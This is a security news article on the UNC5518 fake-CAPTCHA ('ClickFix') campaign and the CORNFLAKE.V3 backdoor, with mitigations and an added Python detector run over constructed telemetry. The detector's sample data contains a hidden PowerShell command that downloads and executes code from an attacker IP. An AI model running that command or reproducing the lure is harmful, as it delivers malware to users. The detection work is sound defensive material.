Categories: Cyber Security News

UNC5518 Exploits Trusted Sites with Fake CAPTCHAs, Delivering Malware to Unsuspecting Users

Mandiant Threat Defense has uncovered a sophisticated cybercriminal operation where threat actors are compromising legitimate websites to distribute malware through deceptive CAPTCHA verification pages, highlighting the evolving tactics of financially motivated cybercriminals in 2024.

ClickFix Campaign Targets Unsuspecting Web Users

Since June 2024, security researchers have been tracking UNC5518, a financially motivated threat cluster that has perfected a technique called “ClickFix” to deceive website visitors.

The group compromises legitimate websites and serves fake CAPTCHA verification pages on them. When a visitor clicks what looks like a standard human-verification check, page JavaScript silently copies a malicious PowerShell command to the clipboard, and the page then instructs the visitor to paste and run it.

The attack begins when users encounter these fake CAPTCHA pages through normal browsing activities, often via search results employing SEO poisoning or malicious advertisements.

When victims follow the on-screen “verification” steps (open the Run dialog with Windows+R, paste with Ctrl+V, press Enter), they execute the PowerShell command themselves; it downloads and runs malware from attacker-controlled servers. Because the user launches the command, no browser exploit is needed and the initial execution looks like ordinary user activity.

Figure: The observed CORNFLAKE.V3 (Node.js) attack lifecycle

Mandiant researchers observed the malicious PowerShell command connecting to 138.199.161.141 on TCP port 8080 to retrieve the next-stage payloads, an indicator defenders can block and hunt for directly.

The downloaded scripts include anti-virtual-machine checks: they inspect system resources and the computer name and abort when the host looks like an analysis sandbox, so the later stages may never run in automated detonation.

Advanced Malware Deployment Through a Partnership Model

UNC5518 operates as an access-as-a-service provider, partnering with other threat groups, including UNC5774, which deploys the CORNFLAKE.V3 backdoor through the compromised access.

This partnership model allows specialized groups to focus on their core competencies while maximizing the impact of initial compromises.

CORNFLAKE.V3 represents a significant evolution from previous versions, transitioning from a simple downloader to a full-featured backdoor with persistence capabilities.

The malware downloads and installs a Node.js runtime and uses it to execute JavaScript payloads as an ordinary host process, outside the browser sandbox, then establishes persistence through a Windows registry Run key value named “ChromeUpdater”.

The backdoor supports multiple payload types, including executables, DLLs, JavaScript, and batch files, and performs extensive reconnaissance, including Active Directory enumeration and Kerberoasting to harvest crackable service-account credentials.

Recent variants have also adopted PHP as an execution environment, demonstrating the threat actors’ adaptability to evade detection.

Enhanced Security Measures Required

Organizations can reduce exposure by disabling the Windows Run dialog where business needs allow (the Explorer “NoRun” policy, exposed in Group Policy as “Remove Run menu from Start Menu”) and by logging PowerShell and Node.js activity well enough to detect the chain described above. The Run-dialog control only breaks this particular lure; ClickFix variants that tell the user to paste into a terminal or the File Explorer address bar are unaffected, so process and registry telemetry is the more durable control.

Mandiant has released detection rules through Google Security Operations, including queries to identify PowerShell launching Node.js from AppData directories and suspicious connections to legitimate infrastructure domains.
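The following is an added example, not code from Mandiant, Google Security Operations, or Cyber Security News. It turns the behaviours described in this article (a download cradle launched from the Run dialog, PowerShell spawning node.exe from AppData, a “ChromeUpdater” Run key, and connections to 138.199.161.141:8080) into a small detector and runs it over constructed Sysmon-style event records embedded inline. The event field names, hostnames, paths and the sample command line are assumptions made for the example, not observed artifacts.

```python
"""
Hunting for ClickFix / CORNFLAKE.V3-style activity in Windows process,
registry and network telemetry.

Added example; the Event fields imitate Sysmon Event IDs 1 (process create),
13 (registry value set) and 3 (network connection). All sample records below
are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Indicators taken from the article.
C2_ENDPOINT = ("138.199.161.141", 8080)
PERSISTENCE_VALUE_NAME = "ChromeUpdater"

APPDATA_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)
NODE_RE = re.compile(r"(^|\\)node(\.exe)?$", re.IGNORECASE)
POWERSHELL_RE = re.compile(r"(^|\\)(powershell|pwsh)(\.exe)?$", re.IGNORECASE)
# Download-cradle verbs typical of the pasted ClickFix one-liner.
CRADLE_RE = re.compile(
    r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|iex|invoke-expression)\b",
    re.IGNORECASE,
)


@dataclass
class Event:
    event_id: int            # 1 = process create, 3 = network, 13 = registry set
    image: str = ""          # process image path
    parent_image: str = ""
    command_line: str = ""
    target_object: str = ""  # registry value path (event 13)
    details: str = ""        # registry value data (event 13)
    dest_ip: str = ""
    dest_port: int = 0


def first_token(cmd: str) -> str:
    """Return the executable part of a command line, honouring a quoted path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(" ", 1)[0]


def detect(ev: Event) -> list:
    """Return the names of the ClickFix/CORNFLAKE indicators matched by one event."""
    hits = []
    if ev.event_id == 1:
        # Lure stage: explorer.exe (the Run dialog) launching a PowerShell download cradle.
        if (POWERSHELL_RE.search(ev.image)
                and ev.parent_image.lower().endswith("explorer.exe")
                and CRADLE_RE.search(ev.command_line)):
            hits.append("powershell_cradle_from_run_dialog")
        # Payload stage: PowerShell launching a Node.js runtime dropped under AppData.
        if (POWERSHELL_RE.search(ev.parent_image)
                and NODE_RE.search(ev.image) and APPDATA_RE.search(ev.image)):
            hits.append("powershell_spawns_node_from_appdata")
    elif ev.event_id == 13:
        # Persistence stage: a Run key named ChromeUpdater, or any Run key pointing at node.exe in AppData.
        if re.search(r"\\CurrentVersion\\Run\\", ev.target_object, re.IGNORECASE):
            exe = first_token(ev.details)
            if (ev.target_object.split("\\")[-1] == PERSISTENCE_VALUE_NAME
                    or (NODE_RE.search(exe) and APPDATA_RE.search(exe))):
                hits.append("run_key_persistence_node")
    elif ev.event_id == 3:
        if (ev.dest_ip, ev.dest_port) == C2_ENDPOINT:
            hits.append("known_c2_endpoint")
    return hits


def triage(events) -> dict:
    """Count how many events matched each indicator across a batch."""
    summary = {}
    for ev in events:
        for hit in detect(ev):
            summary[hit] = summary.get(hit, 0) + 1
    return summary


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
NODE = r"C:\Users\alice\AppData\Roaming\node-v20\node.exe"

# Constructed sample telemetry: four malicious records followed by two benign ones.
SAMPLE_EVENTS = [
    Event(1, image=PS, parent_image=r"C:\Windows\explorer.exe",
          command_line='powershell -w hidden -c "iex (iwr http://138.199.161.141:8080/ -UseBasicParsing)"'),
    Event(1, image=NODE, parent_image=PS,
          command_line=f'"{NODE}" C:\\Users\\alice\\AppData\\Roaming\\node-v20\\main.js'),
    Event(13, target_object=r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater",
          details=f'"{NODE}" C:\\Users\\alice\\AppData\\Roaming\\node-v20\\main.js'),
    Event(3, image=PS, dest_ip="138.199.161.141", dest_port=8080),
    Event(1, image=PS, parent_image=r"C:\Windows\System32\cmd.exe", command_line="powershell Get-Process"),
    Event(1, image=r"C:\Program Files\nodejs\node.exe",
          parent_image=r"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe",
          command_line="node server.js"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.event_id, detect(ev))
    print(triage(SAMPLE_EVENTS))
```

The four rules map one-to-one onto the stages in the article, which is the point: a single hit on the Run-key or C2 rule is high confidence on its own, while the two process rules are most useful correlated on the same host within a short window, since legitimate developer tooling also launches node.exe.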

The collaborative nature of these threats, where initial access providers work with specialized payload operators, represents a concerning trend in cybercriminal operations that demands enhanced organizational security awareness and technical controls.

The post UNC5518 Exploits Trusted Sites with Fake CAPTCHAs, Delivering Malware to Unsuspecting Users appeared first on Cyber Security News.
